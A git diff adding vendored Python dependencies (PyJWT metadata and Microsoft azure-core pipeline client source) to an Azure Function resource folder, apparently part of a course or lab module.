+jwt/contrib/algorithms/pycrypto.py,sha256=mU3vRfk9QKj06ky3XXKXNkxv8-R4mBHbFR3EvbOgJ6k,1249 +jwt/exceptions.py,sha256=kGq96NMkyPBmx7-RXvLXq9ddTo2_SJPKPTpPscvGUuA,986 +jwt/help.py,sha256=w9sYBatZK8-DIAxLPsdxQBVHXnqjOTETJ4dFY5hhEHs,1609 +jwt/utils.py,sha256=RraFiloy_xsB8NA1CrlHxS9lR73If8amInQ3P1mKXeM,2629 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/REQUESTED b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/REQUESTED new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/WHEEL new file mode 100644 index 0000000..c6a71df --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.32.3) +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/entry_points.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/entry_points.txt new file mode 100644 index 0000000..1429888 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/entry_points.txt @@ -0,0 +1,3 @@ +[console_scripts] +pyjwt = jwt.__main__:main + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/top_level.txt new file mode 100644 index 0000000..c192380 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/PyJWT-1.7.1.dist-info/top_level.txt @@ -0,0 +1 @@ +jwt diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/__pycache__/six.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/__pycache__/six.cpython-39.pyc new file mode 100644 index 0000000..58e779e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/__pycache__/six.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/__pycache__/typing_extensions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/__pycache__/typing_extensions.cpython-39.pyc new file mode 100644 index 0000000..de837a3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/__pycache__/typing_extensions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/_cffi_backend.cpython-39-x86_64-linux-gnu.so b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/_cffi_backend.cpython-39-x86_64-linux-gnu.so new file mode 100644 index 0000000..5f69b7e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/_cffi_backend.cpython-39-x86_64-linux-gnu.so differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__init__.py new file mode 100644 index 0000000..8b77634 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__init__.py @@ -0,0 +1,45 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +from ._version import VERSION +__version__ = VERSION + +from ._pipeline_client import PipelineClient +from ._match_conditions import MatchConditions +from ._enum_meta import CaseInsensitiveEnumMeta + + +__all__ = [ + "PipelineClient", + "MatchConditions", + "CaseInsensitiveEnumMeta", +] + +try: + from ._pipeline_client_async import AsyncPipelineClient #pylint: disable=unused-import + __all__.extend(["AsyncPipelineClient"]) +except (ImportError, SyntaxError): # Python <= 3.5 + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..1c170ae Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_enum_meta.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_enum_meta.cpython-39.pyc new file mode 100644 index 0000000..1ace773 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_enum_meta.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_match_conditions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_match_conditions.cpython-39.pyc new file mode 100644 index 0000000..ce0fb39 Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_match_conditions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_pipeline_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_pipeline_client.cpython-39.pyc new file mode 100644 index 0000000..14e8e94 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_pipeline_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_pipeline_client_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_pipeline_client_async.cpython-39.pyc new file mode 100644 index 0000000..cb2aa60 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_pipeline_client_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_version.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_version.cpython-39.pyc new file mode 100644 index 0000000..5757e18 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/_version.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/async_paging.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/async_paging.cpython-39.pyc new file mode 100644 index 0000000..e8c47b2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/async_paging.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/configuration.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/configuration.cpython-39.pyc new file mode 100644 index 0000000..61668ad Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/configuration.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/credentials.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/credentials.cpython-39.pyc new file mode 100644 index 0000000..6fea076 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/credentials.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/credentials_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/credentials_async.cpython-39.pyc new file mode 100644 index 0000000..522f448 Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/credentials_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..0dc0d01 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/messaging.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/messaging.cpython-39.pyc new file mode 100644 index 0000000..325989d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/messaging.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/paging.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/paging.cpython-39.pyc new file mode 100644 index 0000000..927ee73 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/paging.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/serialization.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/serialization.cpython-39.pyc new file mode 100644 index 0000000..99b861a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/serialization.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/settings.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/settings.cpython-39.pyc new file mode 100644 index 0000000..b7e2522 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/__pycache__/settings.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_enum_meta.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_enum_meta.py new file mode 100644 index 0000000..051ce4e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_enum_meta.py @@ -0,0 +1,61 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. 
+# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +from enum import EnumMeta + + +class CaseInsensitiveEnumMeta(EnumMeta): + """Enum metaclass to allow for interoperability with case-insensitive strings. + + Consuming this metaclass in an SDK should be done in the following manner: + + .. code-block:: python + + from enum import Enum + from six import with_metaclass + from azure.core import CaseInsensitiveEnumMeta + + class MyCustomEnum(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + FOO = 'foo' + BAR = 'bar' + + """ + + def __getitem__(cls, name): + # disabling pylint bc of pylint bug https://github.com/PyCQA/astroid/issues/713 + return super(CaseInsensitiveEnumMeta, cls).__getitem__(name.upper()) # pylint: disable=no-value-for-parameter + + def __getattr__(cls, name): + """Return the enum member matching `name` + We use __getattr__ instead of descriptors or inserting into the enum + class' __dict__ in order to support `name` and `value` being both + properties for enum members (which live in the class' __dict__) and + enum members themselves. + """ + try: + return cls._member_map_[name.upper()] + except KeyError: + raise AttributeError(name) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_match_conditions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_match_conditions.py new file mode 100644 index 0000000..fe7fc6b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_match_conditions.py @@ -0,0 +1,35 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. 
+# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +from enum import Enum + +class MatchConditions(Enum): + """An enum to describe match conditions. """ + Unconditionally = 1 + IfNotModified = 2 + IfModified = 3 + IfPresent = 4 + IfMissing = 5 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_pipeline_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_pipeline_client.py new file mode 100644 index 0000000..32ffb78 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_pipeline_client.py @@ -0,0 +1,195 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import logging +from collections.abc import Iterable +from .configuration import Configuration +from .pipeline import Pipeline +from .pipeline.transport._base import PipelineClientBase +from .pipeline.policies import ( + ContentDecodePolicy, + DistributedTracingPolicy, + HttpLoggingPolicy, + RequestIdPolicy, + RetryPolicy, +) + +try: + from typing import TYPE_CHECKING +except ImportError: + TYPE_CHECKING = False + +if TYPE_CHECKING: + from typing import ( + List, + Any, + Dict, + Union, + IO, + Tuple, + Optional, + Callable, + Iterator, + cast, + TypeVar + ) # pylint: disable=unused-import + HTTPResponseType = TypeVar("HTTPResponseType") + HTTPRequestType = TypeVar("HTTPRequestType") + +_LOGGER = logging.getLogger(__name__) + +class PipelineClient(PipelineClientBase): + """Service client core methods. + + Builds a Pipeline client. + + :param str base_url: URL for the request. + :keyword ~azure.core.configuration.Configuration config: If omitted, the standard configuration is used. 
+    :keyword Pipeline pipeline: If omitted, a Pipeline object is created and returned.
+    :keyword list[HTTPPolicy] policies: If omitted, the standard policies of the configuration object are used.
+    :keyword per_call_policies: If specified, the policies will be added into the policy list before RetryPolicy
+    :paramtype per_call_policies: Union[HTTPPolicy, SansIOHTTPPolicy, list[HTTPPolicy], list[SansIOHTTPPolicy]]
+    :keyword per_retry_policies: If specified, the policies will be added into the policy list after RetryPolicy
+    :paramtype per_retry_policies: Union[HTTPPolicy, SansIOHTTPPolicy, list[HTTPPolicy], list[SansIOHTTPPolicy]]
+    :keyword HttpTransport transport: If omitted, RequestsTransport is used for synchronous transport.
+    :return: A pipeline object.
+    :rtype: ~azure.core.pipeline.Pipeline
+
+    .. admonition:: Example:
+
+        .. literalinclude:: ../samples/test_example_sync.py
+            :start-after: [START build_pipeline_client]
+            :end-before: [END build_pipeline_client]
+            :language: python
+            :dedent: 4
+            :caption: Builds the pipeline client.
+    """
+
+    def __init__(self, base_url, **kwargs):
+        super(PipelineClient, self).__init__(base_url)
+        self._config = kwargs.pop("config", None) or Configuration(**kwargs)
+        self._base_url = base_url
+        if kwargs.get("pipeline"):
+            self._pipeline = kwargs["pipeline"]
+        else:
+            self._pipeline = self._build_pipeline(self._config, **kwargs)
+
+    def __enter__(self):
+        self._pipeline.__enter__()
+        return self
+
+    def __exit__(self, *exc_details):
+        self._pipeline.__exit__(*exc_details)
+
+    def close(self):
+        self.__exit__()
+
+    def _build_pipeline(self, config, **kwargs):  # pylint: disable=no-self-use
+        transport = kwargs.get('transport')
+        policies = kwargs.get('policies')
+        per_call_policies = kwargs.get('per_call_policies', [])
+        per_retry_policies = kwargs.get('per_retry_policies', [])
+
+        if policies is None:  # [] is a valid policy list
+            policies = [
+                RequestIdPolicy(**kwargs),
+                config.headers_policy,
+                config.user_agent_policy,
+                config.proxy_policy,
+                ContentDecodePolicy(**kwargs)
+            ]
+            if isinstance(per_call_policies, Iterable):
+                policies.extend(per_call_policies)
+            else:
+                policies.append(per_call_policies)
+
+            policies.extend([config.redirect_policy,
+                             config.retry_policy,
+                             config.authentication_policy,
+                             config.custom_hook_policy])
+            if isinstance(per_retry_policies, Iterable):
+                policies.extend(per_retry_policies)
+            else:
+                policies.append(per_retry_policies)
+
+            policies.extend([config.logging_policy,
+                             DistributedTracingPolicy(**kwargs),
+                             config.http_logging_policy or HttpLoggingPolicy(**kwargs)])
+        else:
+            if isinstance(per_call_policies, Iterable):
+                per_call_policies_list = list(per_call_policies)
+            else:
+                per_call_policies_list = [per_call_policies]
+            per_call_policies_list.extend(policies)
+            policies = per_call_policies_list
+
+            if isinstance(per_retry_policies, Iterable):
+                per_retry_policies_list = list(per_retry_policies)
+            else:
+                per_retry_policies_list = [per_retry_policies]
+            if len(per_retry_policies_list) > 0:
+                index_of_retry = -1
+                for index, policy in enumerate(policies):
+                    if isinstance(policy, RetryPolicy):
+                        index_of_retry = index
+                if index_of_retry == -1:
+                    raise ValueError("Failed to add per_retry_policies; "
+                                     "no RetryPolicy found in the supplied list of policies. ")
+                policies_1 = policies[:index_of_retry + 1]
+                policies_2 = policies[index_of_retry + 1:]
+                policies_1.extend(per_retry_policies_list)
+                policies_1.extend(policies_2)
+                policies = policies_1
+
+        if not transport:
+            from .pipeline.transport import RequestsTransport
+            transport = RequestsTransport(**kwargs)
+
+        return Pipeline(transport, policies)
+
+
+    def send_request(self, request, **kwargs):
+        # type: (HTTPRequestType, Any) -> HTTPResponseType
+        """Method that runs the network request through the client's chained policies.
+
+        >>> from azure.core.rest import HttpRequest
+        >>> request = HttpRequest('GET', 'http://www.example.com')
+        <HttpRequest [GET], url: 'http://www.example.com'>
+        >>> response = client.send_request(request)
+        <HttpResponse: 200 OK>
+
+        :param request: The network request you want to make. Required.
+        :type request: ~azure.core.rest.HttpRequest
+        :keyword bool stream: Whether the response payload will be streamed. Defaults to False.
+        :return: The response of your network call. Does not do error handling on your response.
+        :rtype: ~azure.core.rest.HttpResponse
+        """
+        stream = kwargs.pop("stream", False)  # want to add default value
+        return_pipeline_response = kwargs.pop("_return_pipeline_response", False)
+        pipeline_response = self._pipeline.run(request, stream=stream, **kwargs)  # pylint: disable=protected-access
+        if return_pipeline_response:
+            return pipeline_response
+        return pipeline_response.http_response
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_pipeline_client_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_pipeline_client_async.py
new file mode 100644
index 0000000..815d06c
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/_pipeline_client_async.py
@@ -0,0 +1,226 @@
+# --------------------------------------------------------------------------
+#
+# Copyright (c) Microsoft Corporation. All rights reserved.
+#
+# The MIT License (MIT)
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the ""Software""), to
+# deal in the Software without restriction, including without limitation the
+# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
+# sell copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in
+# all copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
+# IN THE SOFTWARE.
+#
+# --------------------------------------------------------------------------
+
+import logging
+import collections.abc
+from typing import Any, Awaitable
+from .configuration import Configuration
+from .pipeline import AsyncPipeline
+from .pipeline.transport._base import PipelineClientBase
+from .pipeline.policies import (
+    ContentDecodePolicy,
+    DistributedTracingPolicy,
+    HttpLoggingPolicy,
+    RequestIdPolicy,
+    AsyncRetryPolicy,
+)
+
+try:
+    from typing import TYPE_CHECKING, TypeVar
+except ImportError:
+    TYPE_CHECKING = False
+
+HTTPRequestType = TypeVar("HTTPRequestType")
+AsyncHTTPResponseType = TypeVar("AsyncHTTPResponseType")
+
+if TYPE_CHECKING:
+    from typing import (
+        List,
+        Dict,
+        Union,
+        IO,
+        Tuple,
+        Optional,
+        Callable,
+        Iterator,
+        cast,
+    )  # pylint: disable=unused-import
+
+_LOGGER = logging.getLogger(__name__)
+
+class _AsyncContextManager(collections.abc.Awaitable):
+
+    def __init__(self, wrapped: collections.abc.Awaitable):
+        super().__init__()
+        self.wrapped = wrapped
+        self.response = None
+
+    def __await__(self):
+        return self.wrapped.__await__()
+
+    async def __aenter__(self):
+        self.response = await self
+        return self.response
+
+    async def __aexit__(self, *args):
+        await self.response.__aexit__(*args)
+
+    async def close(self):
+        await self.response.close()
+
+
+class AsyncPipelineClient(PipelineClientBase):
+    """Service client core methods.
+
+    Builds an AsyncPipeline client.
+
+    :param str base_url: URL for the request.
+    :keyword ~azure.core.configuration.Configuration config: If omitted, the standard configuration is used.
+    :keyword Pipeline pipeline: If omitted, a Pipeline object is created and returned.
+    :keyword list[AsyncHTTPPolicy] policies: If omitted, the standard policies of the configuration object are used.
+    :keyword per_call_policies: If specified, the policies will be added into the policy list before RetryPolicy
+    :paramtype per_call_policies: Union[AsyncHTTPPolicy, SansIOHTTPPolicy,
+        list[AsyncHTTPPolicy], list[SansIOHTTPPolicy]]
+    :keyword per_retry_policies: If specified, the policies will be added into the policy list after RetryPolicy
+    :paramtype per_retry_policies: Union[AsyncHTTPPolicy, SansIOHTTPPolicy,
+        list[AsyncHTTPPolicy], list[SansIOHTTPPolicy]]
+    :keyword AsyncHttpTransport transport: If omitted, AioHttpTransport is used for asynchronous transport.
+    :return: An async pipeline object.
+    :rtype: ~azure.core.pipeline.AsyncPipeline
+
+    .. admonition:: Example:
+
+        .. literalinclude:: ../samples/test_example_async.py
+            :start-after: [START build_async_pipeline_client]
+            :end-before: [END build_async_pipeline_client]
+            :language: python
+            :dedent: 4
+            :caption: Builds the async pipeline client.
+    """
+
+    def __init__(self, base_url, **kwargs):
+        super(AsyncPipelineClient, self).__init__(base_url)
+        self._config = kwargs.pop("config", None) or Configuration(**kwargs)
+        self._base_url = base_url
+        if kwargs.get("pipeline"):
+            self._pipeline = kwargs["pipeline"]
+        else:
+            self._pipeline = self._build_pipeline(self._config, **kwargs)
+
+    async def __aenter__(self):
+        await self._pipeline.__aenter__()
+        return self
+
+    async def __aexit__(self, *args):
+        await self.close()
+
+    async def close(self):
+        await self._pipeline.__aexit__()
+
+    def _build_pipeline(self, config, **kwargs):  # pylint: disable=no-self-use
+        transport = kwargs.get('transport')
+        policies = kwargs.get('policies')
+        per_call_policies = kwargs.get('per_call_policies', [])
+        per_retry_policies = kwargs.get('per_retry_policies', [])
+
+        if policies is None:  # [] is a valid policy list
+            policies = [
+                RequestIdPolicy(**kwargs),
+                config.headers_policy,
+                config.user_agent_policy,
+                config.proxy_policy,
+                ContentDecodePolicy(**kwargs)
+            ]
+            if isinstance(per_call_policies, collections.abc.Iterable):
+                policies.extend(per_call_policies)
+            else:
+                policies.append(per_call_policies)
+
+            policies.extend([config.redirect_policy,
+                             config.retry_policy,
+                             config.authentication_policy,
+                             config.custom_hook_policy])
+            if isinstance(per_retry_policies, collections.abc.Iterable):
+                policies.extend(per_retry_policies)
+            else:
+                policies.append(per_retry_policies)
+
+            policies.extend([config.logging_policy,
+                             DistributedTracingPolicy(**kwargs),
+                             config.http_logging_policy or HttpLoggingPolicy(**kwargs)])
+        else:
+            if isinstance(per_call_policies, collections.abc.Iterable):
+                per_call_policies_list = list(per_call_policies)
+            else:
+                per_call_policies_list = [per_call_policies]
+            per_call_policies_list.extend(policies)
+            policies = per_call_policies_list
+            if isinstance(per_retry_policies, collections.abc.Iterable):
+                per_retry_policies_list = list(per_retry_policies)
+            else:
+                per_retry_policies_list = [per_retry_policies]
+            if len(per_retry_policies_list) > 0:
+                index_of_retry = -1
+                for index, policy in enumerate(policies):
+                    if isinstance(policy, AsyncRetryPolicy):
+                        index_of_retry = index
+                if index_of_retry == -1:
+                    raise ValueError("Failed to add per_retry_policies; "
+                                     "no RetryPolicy found in the supplied list of policies. ")
+                policies_1 = policies[:index_of_retry + 1]
+                policies_2 = policies[index_of_retry + 1:]
+                policies_1.extend(per_retry_policies_list)
+                policies_1.extend(policies_2)
+                policies = policies_1
+
+        if not transport:
+            from .pipeline.transport import AioHttpTransport
+            transport = AioHttpTransport(**kwargs)
+
+        return AsyncPipeline(transport, policies)
+
+    async def _make_pipeline_call(self, request, **kwargs):
+        return_pipeline_response = kwargs.pop("_return_pipeline_response", False)
+        pipeline_response = await self._pipeline.run(
+            request, **kwargs  # pylint: disable=protected-access
+        )
+        if return_pipeline_response:
+            return pipeline_response
+        return pipeline_response.http_response
+
+    def send_request(
+        self,
+        request: HTTPRequestType,
+        *,
+        stream: bool = False,
+        **kwargs: Any
+    ) -> Awaitable[AsyncHTTPResponseType]:
+        """Method that runs the network request through the client's chained policies.
+
+        >>> from azure.core.rest import HttpRequest
+        >>> request = HttpRequest('GET', 'http://www.example.com')
+        <HttpRequest [GET], url: 'http://www.example.com'>
+        >>> response = await client.send_request(request)
+        <AsyncHttpResponse: 200 OK>
+
+        :param request: The network request you want to make. Required.
